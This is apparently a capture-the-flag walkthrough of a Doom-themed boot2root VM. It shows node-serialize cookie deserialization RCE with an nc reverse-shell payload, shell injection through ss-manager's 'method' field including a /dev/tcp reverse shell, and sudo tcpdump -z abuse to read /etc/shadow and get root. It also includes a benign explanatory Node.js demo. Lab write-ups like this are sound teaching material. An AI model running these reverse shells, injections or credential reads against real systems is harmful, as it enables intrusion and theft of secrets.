Found the target at 192.168.1.138.
So now let’s scan it quickly:
root@kali:~# nmap -sC -sV 192.168.1.138
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 20:47 UTC
Nmap scan report for 192.168.1.138
Host is up (0.00026s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:6E:99:04 (Oracle VirtualBox virtual NIC)
Love the 666 port! Let's check it:
OK, not much... We need to enumerate more:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.1.138:666 > directories
more directories
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.138:666
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/10 20:54:17 Starting gobuster
===============================================================
===============================================================
2019/09/10 20:55:12 Finished
===============================================================
And Nikto:
nikto -url http://192.168.1.138:666
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.138
+ Target Hostname: 192.168.1.138
+ Target Port: 666
+ Start Time: 2019-09-10 20:55:04 (GMT0)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: Express
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2019-09-10 20:55:13 (GMT0) (9 seconds)
---------------------------------------------------------------------------
Not really lucky so far...
Searchsploit was not very helpful either, so let's look at the request in Burp:
GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"
So let's see what's in the cookie. It is URL-encoded Base64 (the trailing %3D is an encoded = padding character); decoded with Burp it reads:
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}
Note that the Expires value is not quoted, so this is not even valid JSON as it stands. Still, now I have a username and a token...
With Burp, I tried passing just the username value, i.e. {"username":"Admin"}, Base64-encoded:
GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIn0=
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"
And I have a welcome page:
Let's try to get a shell. The app runs on Node.js and the cookie is a serialized object, so maybe we can get code execution through deserialization. The _$$ND_FUNC$$_ prefix is the marker the node-serialize package uses for serialized functions: unserialize() eval()s whatever follows it, and the trailing () turns the function into an IIFE so it runs during deserialization itself (CVE-2017-5941).
Creating a payload:
{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('nc 192.168.1.123 4444 -e /bin/sh',(e,out,err)=>{console.log(out);}); }()"}
Then Base64 encode it; that becomes the new profile cookie value.
Then on Kali:
nc -nlvp 4444
listening on [any] 4444 …
Then in Burp:
GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ25jIDE5Mi4xNjguMS4xMjMgNDQ0NCAtZSAvYmluL3NoJywoZSxvdXQsZXJyKT0+e2NvbnNvbGUubG9nKG91dCk7fSk7IH0oKSJ9
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"
Bingo, a shell!
connect to [192.168.1.123] from (UNKNOWN) [192.168.1.138] 47718
id
uid=1001(nodeadmin) gid=1001(nodeadmin) groups=1001(nodeadmin)
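As an added example (not code from this writeup or from the target application), here is why the cookie above gives code execution, and what the safe alternative looks like. unserializeLikeNodeSerialize() is my own reduction of node-serialize's unserialize() eval path and is assumed to be what the app does with the profile cookie; decodeProfileCookie, buildProfileCookie, parseProfileSafely and runDemo are names I chose, and the benign payload is constructed here instead of the nc one-liner. Run it with node.

```javascript
// Added example: the node-serialize eval path behind the _$$ND_FUNC$$_ cookie, next to a
// parser that cannot execute anything. Not code from the target application.
const FUNCFLAG = '_$$ND_FUNC$$_';

// The profile cookie seen in Burp: URL-encoded Base64 (the trailing %3D is an encoded '=').
const ORIGINAL_COOKIE =
  'eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D';

// URL-decode first, then Base64-decode. Skipping the URL step leaves a dangling "In0%3D".
function decodeProfileCookie(cookieValue) {
  return Buffer.from(decodeURIComponent(cookieValue), 'base64').toString('utf8');
}

// Inverse: JSON text -> Base64 cookie value (Express accepts the raw '=' padding).
function buildProfileCookie(jsonText) {
  return Buffer.from(jsonText, 'utf8').toString('base64');
}

// Hypothetical reduction of node-serialize's unserialize(): every string tagged with
// FUNCFLAG is handed to eval(). A trailing "()" in the payload makes it an IIFE, so the
// attacker's code runs right here, before the app ever looks at obj.username.
function unserializeLikeNodeSerialize(jsonText) {
  const obj = JSON.parse(jsonText);
  const walk = (o) => {
    for (const key of Object.keys(o)) {
      const v = o[key];
      if (v !== null && typeof v === 'object') {
        walk(v);
      } else if (typeof v === 'string' && v.startsWith(FUNCFLAG)) {
        o[key] = eval('(' + v.slice(FUNCFLAG.length) + ')'); // attacker-controlled code
      }
    }
  };
  walk(obj);
  return obj;
}

// Safe variant: JSON.parse never executes anything; the shape is checked and the function
// marker is rejected outright (a real app should also sign the cookie, e.g. with an HMAC).
function parseProfileSafely(cookieValue) {
  const obj = JSON.parse(decodeProfileCookie(cookieValue));
  if (typeof obj.username !== 'string' || obj.username.startsWith(FUNCFLAG)) {
    throw new Error('rejected profile cookie');
  }
  return { username: obj.username };
}

// Constructed benign payload: sets a global flag instead of spawning nc.
const BENIGN_PAYLOAD =
  FUNCFLAG + 'function(){ globalThis.ranDuringUnserialize = true; return "rce"; }()';

function runDemo() {
  globalThis.ranDuringUnserialize = false;
  const cookie = buildProfileCookie(JSON.stringify({ username: BENIGN_PAYLOAD }));

  // Vulnerable path: the IIFE runs while the cookie is being deserialized.
  const vulnerable = unserializeLikeNodeSerialize(decodeProfileCookie(cookie));
  const codeRanDuringUnserialize = globalThis.ranDuringUnserialize;

  // Same payload without the trailing "()": a function object is built but never called.
  const noCall = unserializeLikeNodeSerialize(
    JSON.stringify({ username: BENIGN_PAYLOAD.slice(0, -2) }));

  // Safe path: the tagged string is just data and gets rejected.
  let safeRejected = false;
  try { parseProfileSafely(cookie); } catch (e) { safeRejected = true; }

  return {
    vulnerableResult: vulnerable.username,
    codeRanDuringUnserialize,
    withoutParensType: typeof noCall.username,
    safeRejected,
  };
}

console.log(decodeProfileCookie(ORIGINAL_COOKIE));
console.log(runDemo());
```

Decoding ORIGINAL_COOKIE with this function shows the unquoted Expires value, so JSON.parse() throws on it; the stripped {"username":"Admin"} cookie parses fine, which is the version the rest of the attack builds on.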
So as usual, let's upgrade to a full TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
[nodeadmin@localhost ~]$
CTRL-Z
stty raw -echo
fg, then ENTER twice
export TERM=screen
reset
Then I tried sudo -l, just in case, and looked at the sudo binary itself:
[nodeadmin@localhost ~]$ ll /usr/bin/sudo -l
---s--x--x. 1 root root 158608 Feb 9 2018 /usr/bin/sudo
So I uploaded LinEnum:
On Kali:
root@kali:~/tools# python -m SimpleHTTPServer 9000
Serving HTTP on 0.0.0.0 port 9000 …
On the target:
wget http://192.168.1.123:9000/linenum.sh
--2019-09-12 13:24:23-- http://192.168.1.123:9000/linenum.sh
Connecting to 192.168.1.123:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: 'linenum.sh'
linenum.sh 100%[===================>] 44.58K --.-KB/s in 0s
2019-09-12 13:24:23 (410 MB/s) - 'linenum.sh' saved [45652/45652]
[nodeadmin@localhost ~]$ ll
total 88
drwx------. 5 nodeadmin nodeadmin 4096 Sep 12 13:24 .
drwxr-xr-x. 4 root root 4096 Jun 2 2018 ..
-rw-------. 1 nodeadmin nodeadmin 1 Jun 7 2018 .bash_history
-rw-r--r--. 1 nodeadmin nodeadmin 18 Mar 15 2018 .bash_logout
-rw-r--r--. 1 nodeadmin nodeadmin 193 Mar 15 2018 .bash_profile
-rw-r--r--. 1 nodeadmin nodeadmin 231 Mar 15 2018 .bashrc
drwx------ 3 nodeadmin nodeadmin 4096 Jun 1 2018 .config
-rw------- 1 nodeadmin nodeadmin 16 Jun 3 2018 .esd_auth
drwxr-xr-x 4 nodeadmin nodeadmin 4096 Jun 3 2018 .forever
-rw-rw-r-- 1 nodeadmin nodeadmin 45652 Jul 16 12:58 linenum.sh
drwxrwxr-x. 3 nodeadmin nodeadmin 4096 May 30 2018 .web
[nodeadmin@localhost ~]$ chmod +x linenum.sh
[nodeadmin@localhost ~]$ ./linenum.sh -t > enum
[-] Kernel information:
Linux localhost.localdomain 4.16.3-301.fc28.x86_64 #1 SMP Mon Apr 23 21:59:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[-] Specific release information:
Fedora release 28 (Twenty Eight)
NAME=Fedora
VERSION=”28 (Workstation Edition)”
ID=fedora
VERSION_ID=28
PLATFORM_ID=”platform:f28″
PRETTY_NAME=”Fedora 28 (Workstation Edition)”
### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r--. 1 root root 0 Feb 7 2018 /etc/cron.deny
-rw-r--r--. 1 root root 451 Feb 7 2018 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x. 2 root root 4096 Apr 25 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rw-r--r--. 1 root root 128 Feb 7 2018 0hourly
-rw-r--r--. 1 root root 108 Aug 3 2017 raid-check
/etc/cron.daily:
total 28
drwxr-xr-x. 2 root root 4096 Jun 7 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rwxr-xr-x. 1 root root 2239 Feb 7 2018 certwatch
-rwxr-xr-x 1 root root 232 Apr 19 2018 exim-tidydb
-rwxr-xr-x. 1 root root 189 Jan 4 2018 logrotate
/etc/cron.hourly:
total 20
drwxr-xr-x. 2 root root 4096 Apr 25 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rwxr-xr-x. 1 root root 575 Feb 7 2018 0anacron
### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/nc
/usr/bin/wget
/usr/bin/curl
[-] SUID files:
-rws--x--x. 1 root root 41496 Feb 23 2018 /usr/sbin/userhelper
-rwsr-xr-x. 1 root root 11720 Feb 8 2018 /usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 28280 Aug 27 2017 /usr/sbin/mtr-packet
-rwsr-xr-x. 1 root root 11768 Feb 9 2018 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 1408432 Apr 19 2018 /usr/sbin/exim
-rwsr-xr-x. 1 root root 123944 Apr 11 2018 /usr/sbin/mount.nfs
-rwsr-xr-x. 1 root root 38080 Feb 8 2018 /usr/sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 20224 Mar 21 2018 /usr/libexec/gstreamer-1.0/gst-ptp-helper
-rwsr-xr-x. 1 root root 11952 Apr 12 2018 /usr/libexec/Xorg.wrap
-rwsr-sr-x. 1 abrt abrt 15856 Mar 27 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwsr-x---. 1 root dbus 57960 Oct 30 2017 /usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root 44160 Feb 6 2018 /usr/bin/newgidmap
-rwsr-xr-x. 1 root root 32848 Feb 7 2018 /usr/bin/fusermount
-rws--x--x. 1 root root 25936 Mar 27 2018 /usr/bin/chsh
-rwsr-xr-x. 1 root root 59752 Feb 7 2018 /usr/bin/crontab
-rwsr-xr-x. 1 root root 50304 Mar 27 2018 /usr/bin/mount
-rwsr-xr-x. 1 root root 55440 Feb 25 2018 /usr/bin/at
-rwsr-xr-x. 1 root root 46328 Mar 27 2018 /usr/bin/su
-rwsr-xr-x. 1 root root 33136 Mar 27 2018 /usr/bin/umount
-rwsr-xr-x. 1 root root 44168 Feb 6 2018 /usr/bin/newuidmap
-rwsr-xr-x. 1 root root 28168 Apr 4 2018 /usr/bin/pkexec
-rws--x--x. 1 root root 30536 Mar 27 2018 /usr/bin/chfn
-rwsr-xr-x. 1 root root 89296 Feb 6 2018 /usr/bin/gpasswd
---s--x--x. 1 root root 158608 Feb 9 2018 /usr/bin/sudo
-rwsr-xr-x. 1 root root 29008 Apr 12 2018 /usr/bin/passwd
-rwsr-xr-x. 1 root root 82040 Feb 6 2018 /usr/bin/chage
-rwsr-xr-x. 1 root root 49432 Feb 6 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 10480 Jun 1 2018 /usr/local/lib/authbind/helper
-rwsr-xr-x. 1 root root 16304 Apr 4 2018 /usr/lib/polkit-1/polkit-agent-helper-1
[+] Possibly interesting SUID files:
-rwsr-xr-x. 1 root root 28280 Aug 27 2017 /usr/sbin/mtr-packet
[-] SGID files:
-rwxr-sr-x. 1 root root 7608 Feb 9 2018 /usr/sbin/netreport
-rwx--s--x. 1 root lock 16024 Apr 12 2018 /usr/sbin/lockdev
-rwx--s--x. 1 root utmp 11704 Feb 26 2018 /usr/libexec/utempter/utempter
-r-xr-sr-x. 1 root ssh_keys 468032 Apr 12 2018 /usr/libexec/openssh/ssh-keysign
-rwsr-sr-x. 1 abrt abrt 15856 Mar 27 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwxr-sr-x. 1 root tty 20408 Mar 27 2018 /usr/bin/write
-rwx--s--x. 1 root slocate 45064 Feb 9 2018 /usr/bin/locate
Nothing really juicy... However, I noticed that PulseAudio is running, and searchsploit has an exploit for it:
PulseAudio setuid - Local Privilege Escalation | exploits/linux/local/9207.sh
However, gcc is not on the target, so I modified the exploit script so that it only compiles the two binaries on my 64-bit machine (the line that runs the race is commented out):
gcc -m32 -o $workdir/pa_race $workdir/pa_race.c
gcc -m32 -o $workdir/sh $workdir/sh.c
#$workdir/pa_race
Then I changed directory to /tmp and started an HTTP server (note that the addresses changed between sessions: Kali is now 192.168.0.11):
python -m SimpleHTTPServer 9000
Then on the target:
[nodeadmin@localhost ~]$ wget http://192.168.0.11:9000/sh
--2019-09-16 10:37:03-- http://192.168.0.11:9000/sh
Connecting to 192.168.0.11:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15604 (15K) [application/octet-stream]
Saving to: 'sh'
sh 100%[===================>] 15.24K --.-KB/s in 0s
2019-09-16 10:37:03 (178 MB/s) - 'sh' saved [15604/15604]
[nodeadmin@localhost ~]$ wget http://192.168.0.11:9000/pa_race
--2019-09-16 10:37:09-- http://192.168.0.11:9000/pa_race
Connecting to 192.168.0.11:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15896 (16K) [application/octet-stream]
Saving to: 'pa_race'
pa_race 100%[===================>] 15.52K --.-KB/s in 0s
2019-09-16 10:37:09 (250 MB/s) - 'pa_race' saved [15896/15896]
Then:
[nodeadmin@localhost ~]$ chmod +x sh
[nodeadmin@localhost ~]$ chmod +x pa_race
[nodeadmin@localhost ~]$ ./pa_race
link: Invalid cross-device link
CRAP! That error is EXDEV: a hard link cannot cross filesystems, so the exploit's link() call fails when it is run from a directory on a different filesystem from the binary it wants to link, and the race never gets set up.
OK, ps ax shows that ss-manager is running as fireman. ss-manager (the shadowsocks-libev manager) takes JSON commands on a UDP control port, and the method value is pasted into the shell command line it uses to start ss-server, so shell metacharacters in it get executed as fireman. Let's try this:
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||chmod -R 777 /home/fireman||"}
ok^C
[nodeadmin@localhost home]$ ll
total 8
drwxrwxrwx 6 fireman fireman 4096 Jun 7 2018 fireman
drwx------. 6 nodeadmin nodeadmin 4096 Sep 16 10:49 nodeadmin
[nodeadmin@localhost home]$ cd fireman
[nodeadmin@localhost fireman]$ ll
total 0
OK, nothing in fireman's home...
So let's get a shell as fireman. I saw in his bash history that he runs sudo -l, so the same injection now spawns a reverse shell:
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.0.11/8080 0>&1||"}
On Kali:
root@kali:~/boxes/doom# nc -nvlp 8080
listening on [any] 8080 ...
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.16] 42730
bash: cannot set terminal process group (842): Inappropriate ioctl for device
bash: no job control in this shell
[fireman@localhost root]$ id
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
[fireman@localhost root]$
Interesting!
[fireman@localhost root]$ sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump
OK, so let's use tcpdump to execute commands as root. With -G 1 tcpdump rotates the capture file every second, -z runs the given program on each rotated file, and -Z root tells it to keep running as root instead of dropping privileges, so the post-rotate script runs as root:
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -G 1 -z /tmp/.test -Z root
root:$6$jA85omnRVznNFM4j$voN29bYWJUlRbxgsqia46oC9IK/mdRK5B.IYUrJYs196sfA3ye3rSV790EoD76ABKu29CdtnAXQtIAo6OpNWc1:17681:0:99999:7:::
So let's turn that into a root reverse shell.
I created /tmp/root (executable, like /tmp/.test above) containing:
nc -e /bin/sh 192.168.0.16 8090
Then nc -nvlp 8090 on the target itself (192.168.0.16 is the target's own address, so the root shell connects back to a listener on the same box),
and in my fireman shell:
sudo tcpdump -ln -i eth0 -w /dev/null -G 1 -z /tmp/root -Z root
whoami
root
cat flag.txt
[+] You’re a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.
+—————————————————————————–+
| | |\ -~ / \ / |
|~~__ | \ | \/ /\ /|
| — | \ | / \ / \ / |
| |~_| \ \___|/ \/ / |
|–__ | — |\________________________________/~~\~~| / \ / \ |
| |~~–__ |~_|____|____|____|____|____|____|/ / \/|\ / \/ \/|
| | |~–_|__|____|____|____|____|____|_/ /| |/ \ / \ / |
|___|______|__|_||____|____|____|____|____|__[]/_|—-| \/ \ / |
| \mmmm : | _|___|____|____|____|____|____|___| /\| / \ / \ |
| B :_–~~ |_|____|____|____|____|____|____| | |\/ \ / \ |
| __–P : | / / / | \ / \ /\|
|~~ | : | / ~~~ | \ / \ / |
| | |/ .-. | /\ \ / |
| | / | | |/ \ /\ |
| | / | | -_ \ / \ |
+—————————————————————————–+
| | /| | | 2 3 4 | /~~~~~\ | /| |_| …. ……… |
| | ~|~ | % | | | ~J~ | | ~|~ % |_| …. ……… |
| AMMO | HEALTH | 5 6 7 | \===/ | ARMOR |#| …. ……… |
+—————————————————————————–+
FLAG: kre0cu4jl4rzjicpo1i7z5l1
[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.
[+] You can follow me on twitter: @0katz
[+] Thanks to the homie: @Pink_P4nther